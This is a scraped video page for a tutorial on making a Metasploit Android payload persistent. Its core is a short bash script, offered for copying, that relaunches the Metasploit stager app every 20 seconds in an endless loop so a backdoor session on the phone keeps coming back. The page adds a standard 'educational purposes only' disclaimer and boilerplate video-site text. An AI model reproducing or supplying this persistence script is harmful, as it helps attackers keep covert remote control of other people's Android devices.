Creating a Persistent Android Payload with Metasploit: Tutorial

Published: 10 May 2024
on channel: CodeHavox
11,332
272

Copy and Paste this code into a txt file and Save it as anyfilename.sh

Code:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done



This video is for educational purposes only. Any actions taken based on the information provided are solely the responsibility of the viewer. The creator does not encourage or condone any illegal activities.


On this page of the site you can watch the video online Creating a Persistent Android Payload with Metasploit: Tutorial with a duration of hours minute second in good quality, which was uploaded by the user CodeHavox 10 May 2024, share the link with friends and acquaintances, this video has already been watched 11,332 times on youtube and it was liked by 272 viewers. Enjoy your viewing!